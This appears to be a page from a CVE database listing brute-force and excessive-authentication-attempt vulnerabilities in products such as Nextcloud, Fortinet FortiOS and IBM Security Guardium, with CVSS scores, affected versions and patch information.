Total
362 CVE
| CVE | Vendors | Products | Updated | CVSS v2 | CVSS v3 |
|---|---|---|---|---|---|
| CVE-2023-39960 | 1 Nextcloud | 1 Nextcloud Server | 2024-02-28 | N/A | 7.5 HIGH |
| Nextcloud Server provides data storage for Nextcloud, an open source cloud platform. In Nextcloud Server starting with 25.0.0 and prior to 25.09 and 26.04; as well as Nextcloud Enterprise Server starting with 22.0.0 and prior to 22.2.10.14, 23.0.12.9, 24.0.12.5, 25.0.9, and 26.0.4; missing protection allows an attacker to brute force passwords on the WebDAV API. Nextcloud Server 25.0.9 and 26.0.4 and Nextcloud Enterprise Server 22.2.10.14, 23.0.12.9, 24.0.12.5, 25.0.9, and 26.0.4 contain patches for this issue. No known workarounds are available. | |||||
| CVE-2015-20110 | 1 Jhipster | 1 Jhipster | 2024-02-28 | N/A | 7.5 HIGH |
| JHipster generator-jhipster before 2.23.0 allows a timing attack against validateToken due to a string comparison that stops at the first character that is different. Attackers can guess tokens by brute forcing one character at a time and observing the timing. This of course drastically reduces the search space to a linear amount of guesses based on the token length times the possible characters. | |||||
| CVE-2022-24402 | 1 Midnightblue | 1 Tetra\ | 2024-02-28 | N/A | 7.5 HIGH |
| The TETRA TEA1 keystream generator implements a key register initialization function that compresses the 80-bit key to only 32 bits for usage during the keystream generation phase, which is insufficient to safeguard against exhaustive search attacks. | |||||
| CVE-2023-41350 | 1 Nokia | 2 G-040w-q, G-040w-q Firmware | 2024-02-28 | N/A | 9.8 CRITICAL |
| Chunghwa Telecom NOKIA G-040W-Q has a vulnerability of insufficient measures to prevent multiple failed authentication attempts. An unauthenticated remote attacker can execute a crafted Javascript to expose captcha in page, making it very easy for bots to bypass the captcha check and more susceptible to brute force attacks. | |||||
| CVE-2022-43904 | 1 Ibm | 1 Security Guardium | 2024-02-28 | N/A | 7.5 HIGH |
| IBM Security Guardium 11.3 and 11.4 could disclose sensitive information to an attacker due to improper restriction of excessive authentication attempts. IBM X-Force ID: 240895. | |||||
| CVE-2023-36917 | 1 Sap | 1 Businessobjects Business Intelligence | 2024-02-28 | N/A | 7.5 HIGH |
| SAP BusinessObjects Business Intelligence Platform - version 420, 430, allows an unauthorized attacker who had hijacked a user session, to be able to bypass the victim’s old password via brute force, due to unrestricted rate limit for password change functionality. Although the attack has no impact on integrity loss or system availability, this could lead to an attacker to completely takeover a victim’s account. | |||||
| CVE-2023-33754 | 1 Inpiazza | 1 Cloud Wifi | 2024-02-28 | N/A | 6.5 MEDIUM |
| The captive portal in Inpiazza Cloud WiFi versions prior to v4.2.17 does not enforce limits on the number of attempts for password recovery, allowing attackers to brute force valid user accounts to gain access to login credentials. | |||||
| CVE-2023-34243 | 1 Tgstation13 | 1 Tgstation-server | 2024-02-28 | N/A | 5.3 MEDIUM |
| TGstation is a toolset to manage production BYOND servers. In affected versions if a Windows user was registered in tgstation-server (TGS), an attacker could discover their username by brute-forcing the login endpoint with an invalid password. When a valid Windows logon was found, a distinct response would be generated. This issue has been addressed in version 5.12.5. Users are advised to upgrade. Users unable to upgrade may be mitigated by rate-limiting API calls with software that sits in front of TGS in the HTTP pipeline such as fail2ban. | |||||
| CVE-2022-36413 | 1 Zohocorp | 1 Manageengine Adselfservice Plus | 2024-02-28 | N/A | 9.1 CRITICAL |
| Zoho ManageEngine ADSelfService Plus through 6203 is vulnerable to a brute-force attack that leads to a password reset on IDM applications. | |||||
| CVE-2023-33868 | 1 Piigab | 2 M-bus 900s, M-bus 900s Firmware | 2024-02-28 | N/A | 9.8 CRITICAL |
| The number of login attempts is not limited. This could allow an attacker to perform a brute force on HTTP basic authentication. | |||||
| CVE-2023-35172 | 1 Nextcloud | 1 Nextcloud Server | 2024-02-28 | N/A | 9.1 CRITICAL |
| NextCloud Server and NextCloud Enterprise Server provide file storage for Nextcloud, a self-hosted productivity platform. In NextCloud Server versions 25.0.0 until 25.0.7 and 26.0.0 until 26.0.2 and Nextcloud Enterprise Server versions 21.0.0 until 21.0.9.12, 22.0.0 until 22.2.10.12, 23.0.0 until 23.0.12.7, 24.0.0 until 24.0.12.2, 25.0.0 until 25.0.7, and 26.0.0 until 26.0.2, an attacker can bruteforce the password reset links. Nextcloud Server n 25.0.7 and 26.0.2 and Nextcloud Enterprise Server 21.0.9.12, 22.2.10.12, 23.0.12.7, 24.0.12.2, 25.0.7, and 26.0.2 contain a patch for this issue. No known workarounds are available. | |||||
| CVE-2023-29005 | 1 Flask-appbuilder Project | 1 Flask-appbuilder | 2024-02-28 | N/A | 7.5 HIGH |
| Flask-AppBuilder versions before 4.3.0 lack rate limiting which can allow an attacker to brute-force user credentials. Version 4.3.0 includes the ability to enable rate limiting using `AUTH_RATE_LIMITED = True`, `RATELIMIT_ENABLED = True`, and setting an `AUTH_RATE_LIMIT`. | |||||
| CVE-2023-1539 | 1 Answer | 1 Answer | 2024-02-28 | N/A | 5.3 MEDIUM |
| Improper Restriction of Excessive Authentication Attempts in GitHub repository answerdev/answer prior to 1.0.6. | |||||
| CVE-2023-25820 | 1 Nextcloud | 1 Nextcloud Server | 2024-02-28 | N/A | 7.8 HIGH |
| Nextcloud Server is the file server software for Nextcloud, a self-hosted productivity platform, and Nextcloud Enterprise Server is the enterprise version of the file server software. In Nextcloud Server versions 25.0.x prior to 25.0.5 and versions 24.0.x prior to 24.0.10 as well as Nextcloud Enterprise Server versions 25.0.x prior to 25.0.4, 24.0.x prior to 24.0.10, 23.0.x prior to 23.0.12.5, 22.x prior to 22.2.0.10, and 21.x prior to 21.0.9.10, when an attacker gets access to an already logged in user session they can then brute force the password on the confirmation endpoint. Nextcloud Server should upgraded to 24.0.10 or 25.0.4 and Nextcloud Enterprise Server should upgraded to 21.0.9.10, 22.2.10.10, 23.0.12.5, 24.0.10, or 25.0.4 to receive a patch. No known workarounds are available. | |||||
| CVE-2022-32757 | 1 Ibm | 1 Security Directory Suite Va | 2024-02-28 | N/A | 7.5 HIGH |
| IBM Security Directory Suite VA 8.0.1 through 8.0.1.19 uses an inadequate account lockout setting that could allow a remote attacker to brute force account credentials. IBM X-Force ID: 228510. | |||||
| CVE-2023-32319 | 1 Nextcloud | 1 Nextcloud Server | 2024-02-28 | N/A | 6.5 MEDIUM |
| Nextcloud server is an open source personal cloud implementation. Missing brute-force protection on the WebDAV endpoints via the basic auth header allowed to brute-force user credentials when the provided user name was not an email address. Users from version 24.0.0 onward are affected. This issue has been addressed in releases 24.0.11, 25.0.5 and 26.0.0. Users are advised to upgrade. There are no known workarounds for this vulnerability. | |||||
| CVE-2023-32074 | 1 Nextcloud | 1 User Oidc | 2024-02-28 | N/A | 9.8 CRITICAL |
| user_oidc app is an OpenID Connect user backend for Nextcloud. Authentication can be broken/bypassed in user_oidc app. It is recommended that the Nextcloud user_oidc app is upgraded to 1.3.2 | |||||
| CVE-2022-43947 | 1 Fortinet | 2 Fortios, Fortiproxy | 2024-02-28 | N/A | 8.8 HIGH |
| An improper restriction of excessive authentication attempts vulnerability [CWE-307] in Fortinet FortiOS version 7.2.0 through 7.2.3 and before 7.0.10, FortiProxy version 7.2.0 through 7.2.2 and before 7.0.8 administrative interface allows an attacker with a valid user account to perform brute-force attacks on other user accounts via injecting valid login sessions. | |||||
| CVE-2023-1665 | 1 Linagora | 1 Twake | 2024-02-28 | N/A | 9.8 CRITICAL |
| Improper Restriction of Excessive Authentication Attempts in GitHub repository linagora/twake prior to 0.0.0. | |||||
| CVE-2023-27746 | 1 Blackvue | 4 Dr750-2ch Ir Lte, Dr750-2ch Ir Lte Firmware, Dr750-2ch Lte and 1 more | 2024-02-28 | N/A | 9.8 CRITICAL |
| BlackVue DR750-2CH LTE v.1.012_2022.10.26 was discovered to contain a weak default passphrase which can be easily cracked via a brute force attack if the WPA2 handshake is intercepted. | |||||